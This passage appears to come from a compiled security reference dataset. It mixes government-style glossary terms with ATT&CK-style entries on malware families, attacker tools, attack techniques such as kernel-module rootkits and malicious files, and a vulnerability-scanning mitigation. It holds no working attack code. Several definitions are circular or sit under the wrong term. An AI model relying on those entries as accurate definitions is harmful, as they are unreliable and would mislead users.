Definition: A digital signature that uniquely identifes data and has the property that changing a single bit in the data will cause a completely different message diges to be generated.

Term: information security officer
Definition: Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Name: Vulnerability Scanning
Type: course-of-action
Description: Vulnerability scanning involves the automated or manual assessment of systems, applications, and networks to identify misconfigurations, unpatched software, or other security weaknesses. The process helps prioritize remediation efforts by classifying vulnerabilities based on risk and impact, reducing the likelihood of exploitation by adversaries. This mitigation can be implemented through the following measures: 

Proactive Identification of Vulnerabilities

- Implementation: Use tools like Nessus or OpenVAS to scan endpoints, servers, and applications for missing patches and configuration issues. Schedule regular scans to ensure timely identification of vulnerabilities introduced by new deployments or updates.
- Use Case: A scan identifies unpatched software, such as outdated Apache servers, which could be exploited via CVE-XXXX-XXXX. The server is promptly patched, mitigating the risk.

Cloud Environment Scanning

- Implementation: Use cloud-specific vulnerability management tools like AWS Inspector, Azure Security Center, or GCP Security Command Center to identify issues like open S3 buckets or overly permissive IAM roles.
- Use Case: The scan detects a misconfigured S3 bucket with public read access, which is remediated to prevent potential data leakage.

Network Device Scanning

- Implementation: Use tools to scan network devices for vulnerabilities, such as weak SNMP strings or outdated firmware. Correlate scan results with vendor advisories to prioritize updates.
- Use Case: Scanning detects a router running outdated firmware vulnerable to CVE-XXXX-YYYY. The firmware is updated to a secure version.

Web Application Scanning

- Implementation: Use dynamic application security testing (DAST) tools such as OWASP ZAP or Burp Suite to scan for common vulnerabilities like SQL injection or cross-site scripting (XSS). Perform regular scans post-deployment to identify newly introduced vulnerabilities.
- Use Case: A scan identifies a cross-site scripting vulnerability in a form input field, which is promptly remediated by developers.

Prioritizing Vulnerabilities

- Implementation: Use vulnerability scoring frameworks like CVSS to assess severity.
Integrate vulnerability scanning tools with ticketing systems to assign remediation tasks based on criticality.
- Use Case: A critical vulnerability with a CVSS score of 9.8 affecting remote access servers is prioritized and patched first.

*Tools for Implementation*

Open Source Tools:

- OpenVAS: Comprehensive network and system vulnerability scanning.
- OWASP ZAP: Dynamic scanning of web applications for vulnerabilities.
- Nmap with NSE Scripts: Network scanning with scripts to detect vulnerabilities.

Term: Enterprise Risk
Definition: The effect of uncertainty on enterprise mission and objectives.

Term: +
Definition: Addition. For example, 5 + 4 = 9.

Name: DDKONG
Type: malware
Description: DDKONG is a malware sample that was part of a campaign by Rancor. DDKONG was first seen used in February 2017.

Name: Dyre
Type: malware
Description: Dyre is a banking Trojan that has been used for financial gain.

Term: architecture
Definition: Fundamental concepts or properties of a system in its environment embodied in its elements, relationships, and in the principles of its design and evolution.

Term: MFA
Definition: The three authentication factors are something you know, something you have, and something you are. See authenticator.

Name: NOOPLDR
Type: malware
Description: NOOPLDR is a shellcode loader with XML/C# and DLL versions that has been used by MirrorFace to load HiddenFace.

Term: Reference Version
Definition: The version of the OLIR.

Term: Health Testing
Definition: Testing within an implementation immediately prior to or during normal operation to determine that the implementation continues to perform as implemented and as validated.

Term: nonfederal organization
Definition: An entity that owns, operates, or maintains a nonfederal system.

Term: key management
Definition: The activities involved in the handling of cryptographic keys and other related parameters (e.g., IVs and domain parameters) during the entire life cycle of the keys, including their generation, storage, establishment, entry and output into cryptographic modules, use and destruction.

Term: Relationship
Definition: The type of logical comparison that the Reference Document Developer asserts compared to the Focal Document within a set theory relationship mapping. This will be one of the following: subset of, intersects with, equal to, superset of, or not related to.

Term: detailed assessment
Definition: An assessment that contains all the elements (critical and non-critical) for a given breadth.

Term: accreditation
Definition: The official management decision given by a senior organizational official to authorize operation of an information system and to explicitly accept the risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security controls.

Term: attribute-based access control (ABAC)
Definition: An access control method where subject requests to perform operations on objects are granted or denied based on assigned attributes of the subject, assigned attributes of the object, environment conditions, and a set of policies that are specified in terms of those attributes and conditions.

Name: Malicious File
Type: attack-pattern
Description: An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso.

Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it. 

While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Term: assessment element
Definition: A specific ISCM concept to be evaluated in the context of a specific ISCM Process Step.

Term: needs assessment
Definition: The process of identifying gaps in learning and the needs of learning activities.

Term: firmware
Definition: Software program or set of instructions programmed on the flash ROM of a hardware device. It provides the necessary instructions for how the device communicates with the other computer hardware.

Term: multi-factor authentication
Definition: <p style="margin-left:5.65pt;">A characteristic of an authentication system or an authenticator that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors.</p><p style="margin-left:0in;">&nbsp;The three authentication factors are something you know, something you have, and something you are.</p>

Term: directly identifying variables
Definition: a category of data that contains direct identifiers

Term: Challenge-Response Protocol
Definition: An authentication protocol where the Verifier sends the Claimant a challenge (usually a random value or a nonce) that the Claimant combines with a secret (such as by hashing the challenge and a shared secret together, or by applying a private key operation to the challenge) to generate a response that is sent to the Verifier. The Verifier can independently verify the response generated by the Claimant (such as by re-computing the hash of the challenge and the shared secret and comparing to the response, or performing a public key operation on the response) and establish that the Claimant possesses and controls the secret.

Name: BlackCat
Type: malware
Description: BlackCat is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, BlackCat has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.

Name: Application Exhaustion Flood
Type: attack-pattern
Description: Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.

Term: hypervisor
Definition: A software built using a specialized kernel of an OS, along with supporting kernel modules that provides isolation for various execution stacks represented by Virtual Machines (see below).

Term: IP Payload Compression Protocol
Definition: Protocol used to perform lossless compression for packet payloads.

Term: Internet Message Access Protocol (IMAP)
Definition: a method of communication used to read electronic mail stored in a remote server.

Term: <em>K1</em>
Definition: The first subkey.

Name: Melcoz
Type: malware
Description: Melcoz is a banking trojan family built from the open source tool Remote Access PC. Melcoz was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.

Term: <em>nLen</em>
Definition: The byte length of the RSA modulus n. (Note that in FIPS 186, nlen refers to the bit length of n.)

Name: VPNFilter
Type: malware
Description: VPNFilter is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. VPNFilter modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols. VPNFilter was assessed to be replaced by Sandworm Team with Cyclops Blink starting in 2019.

Term: Test Director
Definition: A person responsible for all aspects of a test, including staffing, development, conduct, and logistics.

Term: Operational Test
Definition: Operational tests involve a deployed system and are usually conducted to measure in-the- field performance and user-system interaction effects. Such tests require the members of a human test population to transact with biometric sensors. False acceptance rates may not be measurable, depending on the controls instituted.

Term: Chief Financial Officer
Definition: A senior member responsible for managing the financial actions of an agency or organization.

Term: chief information security officer
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.

Term: Probability Distribution
Definition: A function that assigns a probability to each measurable subset of the possible outcomes of a random variable.

Term: Business/Mission Objectives
Definition: Broad expression of business goals. Specified target outcome for business operations.

Term: digital transaction
Definition: A recording of an event, such as the transfer of tokens between parties, or the creation of new assets.

Term: experimentation
Definition: A systematic approach to the process of testing new ideas, methods, or activities that applies principles and techniques at the data collection stage to ensure the generation of valid, defensible, and supportable conclusions.

Term: protection needs
Definition: Informal statement or expression of the stakeholder security requirements focused on protecting information, systems, and services associated with mission and business functions throughout the system life cycle.

Term: statement of work requirement
Definition: A type of requirement that represents an action that is performed operationally or during system development.

Term: Authenticated RFID
Definition: The use of digital signature technology to provide evidence of the authenticity of a tag and possibly chain of custody events.

Term: security control and privacy control
Definition: See security control and privacy control.

Name: ANDROMEDA
Type: malware
Description: ANDROMEDA is commodity malware that was widespread in the early 2010's and continues to be observed in infections across a wide variety of industries. During the 2022 C0026 campaign, threat actors re-registered expired ANDROMEDA C2 domains to spread malware to select targets in Ukraine.

Term: Short Message Service (SMS)
Definition: A cellular network facility that allows users to send and receive text messages of up to 160 alphanumeric characters on their handset.

Term: Evaluation Assurance Level
Definition: Set of assurance requirements that represent a point on the Common Criteria predefined assurance scale. 
Rationale: NIAP has switched to a “protection profile” program to secure devices.

Term: information system security plan
Definition: See information system security plan.

Term: square
Definition: The property that some element&nbsp;<span class="math-tex">\(x\)</span>&nbsp;of a finite field&nbsp;<span class="math-tex">\(\mathbf{GF}(q)\)</span>&nbsp;can be written as&nbsp;<span class="math-tex">\(x=z^2\)</span>&nbsp;for some element&nbsp;<span class="math-tex">\(z\)</span>&nbsp;in the same field&nbsp;<span class="math-tex">\(\mathbf{GF}(q)\)</span>.

Term: checksum
Definition: A value that (a) is computed by a function that is dependent on the content of a data object and (b) is stored or transmitted together with the object, for detecting changes in the data

Term: DATO
Definition: Denial of Authorization to Operate; issued by a DAO to an issuer that is not authorized as being reliable for the issuance of PIV Cards or Derived PIV Credentials.

Term: Technology-Based Input Product
Definition: Manufactured components used in the organization manufacturing process incorporating information technology and provided by third-parties (e.g. PLC, Sensors, Data Collection Systems, Workstations, Servers, etc).

Term: <em>Non-physical non-deterministic random bit generator</em>
Definition: An entropy source that does not use dedicated hardware but uses system resources (RAM content, thread number etc.) or the interaction of the user (time between keystrokes etc.).

Term: Biometric On-Card Comparison Authentication (OCC-AUTH)
Definition: An authentication mechanism where biometric on-card comparison (OCC) is used instead of a PIN to activate a PIV Card for authentication.

Term: cryptographic module
Definition: The set of hardware, software, firmware, or some combination thereof that implements cryptographic logic or processes, including cryptographic algorithms, and is contained within the cryptographic boundary of the module.

Term: strength of function
Definition: Criterion expressing the minimum efforts assumed necessary to defeat the specified security behavior of an implemented security function by directly attacking its underlying security mechanisms. 
Note 1: Strength of function has as a prerequisite that assumes that the underlying security mechanisms are correctly implemented. The concept of strength of functions may be equally applied to services or other capability-based abstraction provided by security mechanisms. 
Note 2: The term robustness combines the concepts of assurance of correct implementation with strength of function to provide finer granularity in determining the trustworthiness of a system.

Term: Read-Only Memory
Definition: A pre-recorded ISM that can only be read from and not written to.

Term: security control baseline
Definition: One of the sets of minimum security controls defined for federal information systems in NIST Special Publication 800-53 and CNSS Instruction 1253.

Term: trustworthiness
Definition: The degree to which the behavior of a component is demonstrably compliant with its stated requirements.

Term: Key management protocol
Definition: Documented and coordinated rules for exchanging keys and metadata (e.g., X.509 certificates).

Term: depth
Definition: An attribute associated with an assessment method that addresses the rigor and level of detail associated with the application of the method. The values for the depth attribute, hierarchically from less depth to more depth, are basic, focused, and comprehensive.

Term: Chief Artificial Intelligence Officer
Definition: A senior executive responsible for coordinating their agency’s use of artificial intelligence (AI), promoting AI innovation in their agency, and managing risks from their agency’s use of AI.

Term: cryptographic initialization
Definition: Function used to set the state of a cryptographic logic prior to key generation, encryption, or other operating mode.

Term: Byte
Definition: A bit string consisting of eight bits. A byte is represented by a hexadecimal string of length two. The right-most hexadecimal character represents the rightmost four bits of the byte, and the left-most hexadecimal character of the byte represents the left-most four bits of the byte. For example, 9d represents the bit string 10011101.

Term: hash output
Definition: The result of applying a hash function to a message

Term: SOCKS Protocol
Definition: An Internet protocol to allow client applications to form a circuit-level gateway to a network firewall via a proxy service.

Term: malware
Definition: See Malicious malicious Ccode.

Term: specification
Definition: An assessment object that includes document-based artifacts (e.g., policies, procedures, plans, system security requirements, functional specifications, architectural designs) associated with a system.

Term: RA
Definition: A value that defines an analyzer's estimated level of security risk for using an app. Risk assessments are typically based on the likelihood that a detected vulnerability will be exploited and the impact that the detected vulnerability may have on the app or its related device or network. Risk assessments are typically represented as categories (e.g., low-, moderate-, and high-risk).

Term: identity verification
Definition: The process of evaluating a system or component to determine whether the products of a given development phase satisfy the conditions imposed at the start of that phase (INCOSE).

Term: Criticality Reviews
Definition: A determination of the ranking and priority of manufacturing system components, services, processes, and inputs in order to establish operational thresholds and recovery objectives.

Term: system service
Definition: A capability provided by a system that facilitates information processing, storage, or transmission.

Term: Personal accountability
Definition: A policy that requires that every person who accesses sensitive information be held accountable for his or her actions. A method for identity authentication is required.

Term: approved
Definition: FIPS-approved or NIST-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation or 2) adopted in a FIPS or NIST Recommendation and specified either (a) in an appendix to the FIPS or NIST Recommendation or (b) in a document referenced by the FIPS or NIST Recommendation.

Term: Direct Random String
Definition: In the RBG-based construction of IVs, an output string of an RBG that is used as the random field for an IV.

Name: Network Device Configuration Dump
Type: attack-pattern
Description: Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

Term: Skimming
Definition: The unauthorized use of a reader to read tags without the authorization or knowledge of tag’s owner or the individual in possession of the tag.

Term: risk identification
Definition: Process of finding, recognizing, and describing risks.

Term: assurance
Definition: Measure of confidence that the security features, practices, procedures, and architecture of an information system accurately mediates and enforces the security policy.

Term: PHI
Definition: Individually identifiable health information: (1) Except as provided in paragraph (2) of this definition, that is: (i) Transmitted by electronic media; (ii) Maintained in electronic media; or (iii) Transmitted or maintained in any other form or medium. (2) Protected health information excludes individually identifiable health information in: (i) Education records covered by the Family Educational Rights and Privacy Act, as amended, 20 USC. 1232g; (ii) Records described at 20 USC. 1232g(a)(4)(B)(iv); and (iii) Employment records held by a covered entity in its role as employer.

Term: BGP Peer
Definition: A router running the BGP protocol that has an established BGP session active.

Term: decertification
Definition: Revocation of the certification of an information system item or equipment for cause.

Term: attribute-based access control (ABAC)
Definition: An access control approach in which access is mediated based on attributes associated with subjects (requesters) and the objects to be accessed. Each object and subject has a set of associated attributes, such as location, time of creation, access rights, etc. Access to an object is authorized or denied depending upon whether the required (e.g., policy-defined) correlation can be made between the attributes of that object and of the requesting subject.

Term: information system security officer
Definition: Individual assigned responsibility for maintaining the appropriate operational security posture for an information system or program.
[Note: ISSO responsibility may be assigned by the senior agency information security officer, authorizing official, management official, or information system owner.]

Term: Forensic examiner
Definition: A person who is an expert in acquiring, preserving, analyzing, and presenting digital evidence from computers and other digital media. This evidence may be related to computer-based and non-cyber crimes, including security threats, cyber-attacks, and other illegal activities.

Term: IR
Definition: A relationship between a Focal Document Element and a Reference Document Element.

Term: decryption key
Definition: The cryptographic key used to decrypt the encrypted payload. In asymmetric cryptography, the decryption key refers to the private key of the cryptographic key pair. In symmetric cryptography, the decryption key is the symmetric key.

Name: Kapeka
Type: malware
Description: Kapeka is a backdoor written in C++ used against victims in Eastern Europe since at least mid-2022. Kapeka has technical overlaps with Exaramel for Windows and Prestige malware variants, both of which are linked to Sandworm Team. Kapeka may have been used in advance of Prestige deployment in late 2022.

Term: Entropy Source
Definition: The combination of a noise source, health tests, and an optional conditioning component that produce random bitstrings to be used by an RBG.

Term: Access Complexity
Definition: reflects the complexity of the attack required to exploit the software feature misuse vulnerability.

Term: SHAKE256/256(M)
Definition: SHAKE256(M, 256), where SHAKE256 is specified in Section 6.2 of [5]. The output length is 256 bits.

Term: multi-factor authentication
Definition: Authentication using two or more factors to achieve authentication. Factors are (i) something you know (e.g., password/personal identification number); (ii) something you have (e.g., cryptographic identification device, token); and (iii) something you are (e.g., biometric).

Term: REST
Definition: A software architectural style that defines a common method for defining APIs for Web services.

Term: Security Authorization Boundary
Definition: All components of an information system to be authorized for operation by an authorizing official and excludes separately authorized systems, to which the information system is connected.

Name: HTTPTroy
Type: malware
Description: HTTPTroy is a highly obfuscated backdoor that facilitates collection, command and control, defense evasion and exfiltration. HTTPTroy was first reported in October 2025. HTTPTroy has been observed in operations attributed to DPRK-affiliated threat actors, including Kimsuky. HTTPTroy has been delivered to victims through a separate loader leveraged by Kimsuky.

Term: Well-Formed CPE Name
Definition: A logical construct that constitutes an unordered list of A-V pairs that collectively describe or identify one or more operating systems, software applications, or hardware devices. Unordered means that there is no prescribed order in which A-V pairs should be listed, and there is no specified relationship (hierarchical, set-theoretic, or otherwise) among attributes. WFNs must satisfy the criteria specified in the CPE Naming specification [CPE23-N:5.2]. For a full description and usage constraints on WFN logical attribute values, see Section 5 of the CPE Naming specification [CPE23-N:5].

Term: Representational State Transfer (REST)
Definition: A software architectural style that defines a common method for defining APIs for Web services.

Term: Primitive
Definition: A low-level cryptographic algorithm used as a basic building block for higher-level cryptographic operations or schemes.

Term: network access
Definition: Access to a system by a user (or a process acting on behalf of a user) communicating through a network (e.g., local area network, wide area network, the internet).

Term: RP subscriber account
Definition: An account established and managed by the RP in a federated system based on the RP’s view of the subscriber account from the IdP. An RP subscriber account is associated with one or more federated identifiers and allows the subscriber to access the account through a federation transaction with the IdP.

Term: information system security officer
Definition: See information systems security officer (ISSO).

Term: margin
Definition: The margin allocated during design based on assessments of uncertainty and unknowns. This margin is often consumed as the design matures.

Term: Target Operational Environment
Definition: The IT product’s operational environment, such as Standalone, Managed, or Custom (with description, such as Specialized Security-Limited Functionality, Legacy, or United States Government). Generally only applicable for security compliance/vulnerability checklists.

Term: Integer to Byte String conversion routine
Definition: Integer to Byte String conversion routine.

Term: Hypertext Transfer Protocol Secure (HTTPS)
Definition: HTTP transmitted over TLS.

Term: technical profile
Definition: A fully conformant subset of functionality of a protocol or standard. Technical profiles are used to enhance interoperability.

Term: incident response plan
Definition: The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of a malicious cyber attacks against an organization’s information systems(s).

Term: system security plan
Definition: A formal document that provides an overview of the security requirements for an information system and describes the security controls in place or planned for meeting those requirements.

Term: RA
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Term: hash digest
Definition: The result of applying a hash function to information.

Term: audit trail
Definition: A record showing who has accessed an information technology (IT) system and what operations the user has performed during a given period.

Term: authenticate
Definition: See Authentication.

Term: Attribute-Value Pair
Definition: A tuple a=v in which a (the attribute) is an alphanumeric label representing a property or state, and v (the value) is the value assigned to the attribute.

Term: Statement coverage
Definition: This is the simplest of coverage criteria – the percentage of statements exercised by the test set.

Term: <em>Destruction</em>
Definition: The process of overwriting, erasing, or physically destroying a key so that it cannot be recovered.

Term: sensitivity
Definition: the degree to which an IT system or application requires protection (to ensureconfidentiality, integrity, and availability) which is determined by an evaluation of the nature and criticality of the data processed, the relation of the system to the organization missions and the economic value of the system components.

Term: security control
Definition: A mechanism designed to address needs as specified by a set of security requirements.

Term: controlled area
Definition: Any area or space for which an organization has confidence that the physical and procedural protections provided are sufficient to meet the requirements established for protecting the information and/or information system.

Term: message authentication code (MAC)
Definition: A bit string of fixed length, computed by a MAC generation algorithm, that is used to establish the authenticity and, hence, the integrity of a message.

Term: Destroyed state
Definition: A key state to which a key transitions when it is destroyed. Although the key no longer exists, its previous existence may be recorded (e.g., in metadata or audit logs).

Term: assessor
Definition: The individual, group, or organization responsible for conducting a security control assessment.

Term: ID
Definition: The process of verifying the identity of a user, process, or device, usually as a prerequisite for granting access to resources in an IT system.

Name: USBStealer
Type: malware
Description: USBStealer is malware that has been used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL.

Term: audit log
Definition: A chronological record of system activities, including records of system accesses and operations performed in a given period.

Name: PowerShower
Type: malware
Description: PowerShower is a PowerShell backdoor used by Inception for initial reconnaissance and to download and execute second stage payloads.

Term: product
Definition: Part of the equipment (hardware, software and materials) for which usability is to be specified or evaluated.

Term: Transaction
Definition: A discrete event between a user and a system that supports a business or programmatic purpose.
A government digital system may have multiple categories or types of transactions, which may require separate analysis within the overall digital identity risk assessment.

Term: Cryptographic keying relationship
Definition: Two or more entities share the same symmetric key.

Term: Active Directory
Definition: A Microsoft directory service for the management of identities in Windows domain networks.

Term: system owner (or program manager)
Definition: Official responsible for the overall procurement, development, integration, modification, operation, and maintenance of a system.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service. Also, the potential for a threat-source to successfully exploit a particular information system vulnerability.

Term: trusted pool
Definition: A physical or logical grouping of computing hardware in a data center that is tagged with specific and varying security policies. Within a trusted compute pool, the access and execution of applications and workloads are monitored, controlled, audited, etc.

Term: out-of-distribution
Definition: Data that was collected at a different time and possibly under different conditions or in a different environment than the data collected to train the model.

Term: end-item accounting
Definition: Accounting for all the accountable components of a COMSEC equipment configuration by a single short title.

Term: Key owner
Definition: An entity authorized to use a cryptographic key or key pair and whose identifier is associated with a cryptographic key or key pair.

Term: Satisfaction
Definition: Freedom from discomfort, and positive attitudes towards the use of the product.

Term: Open Vulnerability and Assessment Language (OVAL)
Definition: SCAP language for specifying low-level testing procedures used by checklists.

Term: countermeasures
Definition: A safeguard or countermeasure prescribed for an information system or an organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements.

Name: LoJax
Type: malware
Description: LoJax is a UEFI rootkit used by APT28 to persist remote access software on targeted systems.

Term: covert storage channel
Definition: A system feature that enables one system entity to signal information to another entity by directly or indirectly writing a storage location that is later directly or indirectly read by the second entity.

Term: memorized secret
Definition: See memorized secret.

Name: Confucius
Type: intrusion-set
Description: Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.

Term: Personal Digital Assistant (PDA)
Definition: A handheld computer that serves as a tool for reading and conveying documents, electronic mail, and other electronic media over a communications link, and for organizing personal information, such as a name-and-address database, a to-do list, and an appointment calendar.

Term: AE
Definition: The function of GCM in which the plaintext is encrypted into the ciphertext, and an authentication tag is generated on the AAD and the ciphertext.

Term: <em>Z</em>
Definition: Shared secret.

Term: attribute-based access control (ABAC)
Definition: Access control based on attributes associated with and about subjects, objects, targets, initiators, resources, or the environment. An access control rule set defines the combination of attributes under which an access may take place. 
See also identity, credential, and access management (ICAM).

Term: party
Definition: A person, device, service, network, domain, manufacturer, or other party who might interact with an IoT device.

Term: Object Naming Service
Definition: An inter-enterprise subsystem for the EPCglobal Network that provides network resolution services that direct EPC queries to the location where information associated with that EPC can be accessed by authorized users.

Name: Final1stspy
Type: malware
Description: Final1stspy is a dropper family that has been used to deliver DOGCALL.

Term: String
Definition: An ordered sequence (string) of 0s and 1s. The leftmost bit is the most significant bit.

Term: Initialization Vector (IV)
Definition: A binary vector used as the input to initialize the algorithm for the encryption of a plaintext block sequence to increase security by introducing additional cryptographic variance and to synchronize cryptographic equipment. The initialization vector need not be secret. Some of the Triple Data Encryption Algorithm Modes of Operation require 3 initialization vectors.

Term: Key Chords
Definition: Specific hardware keys pressed in a particular sequence on a mobile device.

Term: authorize processing
Definition: Access privileges granted to an entity; conveys an “official” sanction to perform a security function or activity.

Term: asset reporting format
Definition: A format for expressing the transport format of information about assets and the relationships between assets and reports.

Term: Tuple Density
Definition: Sum of t and the fraction of the covered (t+1)-tuples out of all possible (t+1)-tuples.

Term: Sandbox
Definition: A restricted, controlled execution environment that prevents potentially malicious software, such as mobile code, from accessing any system resources except those for which the software is authorized.

Term: Octet Length
Definition: The number of octets in an octet string.

Term: ICT
Definition: Encompasses the capture, storage, retrieval, processing, display, representation, presentation, organization, management, security, transfer, and interchange of data and information.

Term: Key-wrapping key
Definition: In this Recommendation, a key-wrapping key is a symmetric key established through a key-agreement transaction and used with a key-wrapping algorithm to protect the keying material to be transported.

Term: IT System
Definition: Combination of interacting elements organized to achieve one or more stated purposes.

Term: Publishing node
Definition: a full node that also publishes new blocks

Term: secret key
Definition: A cryptographic key that is used with a (symmetric) cryptographic algorithm that is uniquely associated with one or more entities and is not made public. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure.

Term: derived requirement
Definition: A requirement that is implied or transformed from a higher-level requirement. 
Note 1: Implied requirements cannot be assessed since they are not contained in any requirements baseline. The decomposition of requirements throughout the engineering process makes implicit requirements explicit, allowing them to be stated and captured in appropriate baselines and allowing associated assessment criteria to be stated. 
Note 2: A derived requirement must trace back to at least one higher-level requirement.

Term: Side-Channel Attack
Definition: An attack enabled by leakage of information from a physical cryptosystem. Characteristics that could be exploited in a side-channel attack include timing, power consumption, and electromagnetic and acoustic emissions.

Term: On-Chain
Definition: Refers to data that is stored or a process that is implemented and executed within a blockchain system.

Term: OLIR Catalog
Definition: The Online Informative References (OLIR) Catalog, which provides information about the Informative References submitted to and accepted by NIST.

Term: hash value/result
Definition: The fixed-length bit string produced by a hash function.

Term: UOCAVA Systems
Definition: Information technology systems which support various aspects of the UOCAVA voting process?

Name: Windows Credential Editor
Type: tool
Description: Windows Credential Editor is a password dumping tool.

Term: module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and keygeneration methods) and is contained within a cryptographic module boundary. See FIPS 140.

Term: PII
Definition: Any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual’s identity, such as name, social security number, date and place of birth, mother‘s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.

Term: categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in Committee on National Security Systems (CNSS) Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.

Term: boundary
Definition: A physical or logical perimeter of a system.

Term: CE
Definition: A method of sanitization in which the media encryption key (MEK) for the encrypted Target Data is sanitized, making recovery of the decrypted Target Data infeasible.

Term: Identity Provider (IdP)
Definition: A trusted entity that issues or registers subscriber authenticators and issues electronic credentials to subscribers. A CSP may be an independent third party or issue credentials for its own use.

Term: Platform as a Service (PaaS)
Definition: The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages, libraries, services, and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment.

Term: mission objective
Definition: A high-level goal that must be achieved for an organization to succeed at its primary mission or purpose.

Name: Hypervisor CLI
Type: attack-pattern
Description: Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the hypervisor itself and the guest virtual machines it hosts. 

For example, on ESXi systems, tools such as `esxcli` and `vim-cmd` allow administrators to configure firewall rules and log forwarding on the hypervisor, list virtual machines, start and stop virtual machines, and more. Adversaries may be able to leverage these tools in order to support further actions, such as File and Directory Discovery or Data Encrypted for Impact.

Name: Ruler
Type: tool
Description: Ruler is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of Ruler have also released a defensive tool, NotRuler, to detect its usage.

Name: Kernel Modules and Extensions
Type: attack-pattern
Description: Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. 

When used maliciously, LKMs can be a type of kernel-mode Rootkit that run with the highest operating system privilege (Ring 0). Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.

Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.

Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.

Adversaries can use LKMs and kexts to conduct Persistence and/or Privilege Escalation on a system. Examples have been found in the wild, and there are some relevant open source projects as well.

Term: Cyber Threat
Definition: the likelihood or frequency of a harmful event occurring

Term: callibration
Definition: A comparison between a device under test and an established standard, such as Coordinated Universal Time UTC (NIST). When the calibration is finished, it should be possible to state the estimated time offset and/or frequency offset of the device under test with respect to the standard, as well as the measurement uncertainty. Calibrations can be absolute or relative. Absolute calibrations are not biased by the calibration reference and would, therefore, be more reproducible. However, absolute calibrations can be more complex to determine. The bias in relative calibrations would be consistent if all the devices in the system are calibrated against the same calibration reference. Calibrations may also be performed relative to other devices without reference to an absolute standard. Relative calibrations are generally simpler to perform than absolute calibrations.

Term: identifiable person
Definition: one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity

Term: Enrollment
